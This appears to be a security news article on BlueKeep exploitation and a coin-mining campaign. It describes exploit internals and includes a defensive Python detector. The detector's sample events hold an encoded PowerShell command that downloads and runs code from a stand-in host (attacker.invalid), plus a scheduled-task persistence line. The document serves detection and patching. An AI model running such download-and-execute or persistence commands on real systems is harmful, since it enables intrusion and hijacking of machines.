BlueKeep is not an unheard-of exploit, but active exploitation of the BlueKeep vulnerability has hit the headlines only recently. Tracked as CVE-2019-0708, BlueKeep is a critical, wormable remote code execution flaw in Remote Desktop Services that Microsoft patched in the May 2019 Patch Tuesday updates. Over 724,000 systems worldwide could still be unpatched and exposed to attack.
A security researcher named Kevin Beaumont built a worldwide honeypot network named BluePot using Azure Sentinel with Microsoft Sysmon. Although no signs of attack were observed initially, late October saw a steep increase in honeypots crashing and rebooting. Kryptos Logic analyzed the crash dump from one of the honeypots in Germany, looking at the pool allocations carrying the pool tag TSic, which is used by IcaAllocateChannel in the Windows RDP driver termdd.sys. The presence of thousands of allocations of size 0x170 with the TSic tag suggested abnormal behavior.
Looking back at the BlueKeep exploit, an allocation of exactly 0x170 bytes is required to fill the hole left by the freed MS_T120 channel structure, to which a dangling pointer still refers. Thousands of such allocations also point to a heap spraying technique being used for exploitation. To gain remote code execution, an attacker must hijack a pointer at offset 0x100 in the channel structure; this pointer indirectly links to a function that leads to the shellcode. In the dump, that pointer dereferenced the address fffffa80`08807048, which led to the exploit payload. The researchers were able to match these parameters with the recent attack sample, indicating a BlueKeep exploit. The attackers had used the same shellcode, with the user-mode egg, as the BlueKeep Metasploit module.
The payload was an encoded PowerShell command that downloads a further PowerShell command from the attacker's server. The last stage executed a malicious binary connected to a cryptocurrency miner.
Microsoft did its part by working closely with the researchers to investigate the RDP exploits. Microsoft points out that customers of Microsoft Defender ATP were protected from early September, well before the deployed honeypots were attacked. A number of critical signals were collected through the behavioral detection for the BlueKeep Metasploit module in Microsoft Defender ATP. A close examination of the C2 servers and the behavioral aspects of the recent attacks linked the BlueKeep exploitation to an ongoing coin mining campaign. Systems in France, Russia, Italy, Spain, Ukraine, Germany and the United Kingdom, among other countries, were infected with the same coin miner payload.
According to Microsoft, the attacks likely started with a port scan for machines exposing vulnerable RDP services. The next step was to run a PowerShell script using the BlueKeep Metasploit module to download and launch further encoded PowerShell scripts. Apart from retrieving the coin miner payload, the final scripts also create scheduled tasks to achieve persistence on the infected machines. The coin miner is finally saved as ‘C:\Windows\System32\spool\svchost.exe’ on the target.
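Detection logic for the chain described above (an encoded PowerShell launcher, scheduled-task persistence, and a miner dropped as svchost.exe under the spool directory), as an added example written for this page rather than code from Microsoft or the researchers. It runs over constructed Sysmon-style process-creation records; the parent processes and the decoded download command are assumptions, not observed data.

```python
import base64
import ntpath
import re

# Constructed Sysmon Event ID 1 (process creation) records reduced to the three
# fields the rules use. Illustrative only; the parent images are assumptions.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://attacker.invalid/s')"
    .encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\spoolsv.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -e " + ENCODED},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks.exe /create /sc minute /mo 30 /tn Upd /tr "
                    "powershell.exe -e " + ENCODED},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\spool\svchost.exe",
     "CommandLine": r"C:\Windows\System32\spool\svchost.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",   # benign control
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# -EncodedCommand and its unambiguous prefixes (-e, -en, -enc, ...) plus base64.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:n[a-z]*)?\s+([A-Za-z0-9+/=]{20,})")
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:   # bad base64 or undecodable text
        return None

def triage(events):
    """Apply the three campaign rules; return a list of (rule, detail) findings."""
    findings = []
    for ev in events:
        image, cmd = ev["Image"], ev["CommandLine"]
        name = ntpath.basename(image).lower()
        if name == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append(("encoded_powershell", decoded))
        if name == "schtasks.exe" and "/create" in cmd.lower():
            findings.append(("scheduled_task_persistence", cmd))
        if name == "svchost.exe" and ntpath.dirname(image).lower() not in SYSTEM_DIRS:
            findings.append(("svchost_outside_system32", image))
    return findings
```

Decoding the encoded command exposes the download stage in clear text, so the finding carries the URL an analyst would pivot on next.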
There have been no reports of malware or ransomware abusing BlueKeep so far. However, it is very likely that attackers will sooner or later incorporate BlueKeep exploits into their malware, with devastating consequences.
The vulnerability affects the following Windows versions:
- Windows 7
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2003
- Windows Vista
- Windows XP
An unauthenticated attacker who connects to the target system over RDP and sends specially crafted requests can execute arbitrary code on that system.
Microsoft released a patch for this vulnerability (CVE-2019-0708) in the May 2019 Patch Tuesday updates. It is strongly recommended to apply the patches for CVE-2019-0708 on all internet-facing systems with RDP without any further delay.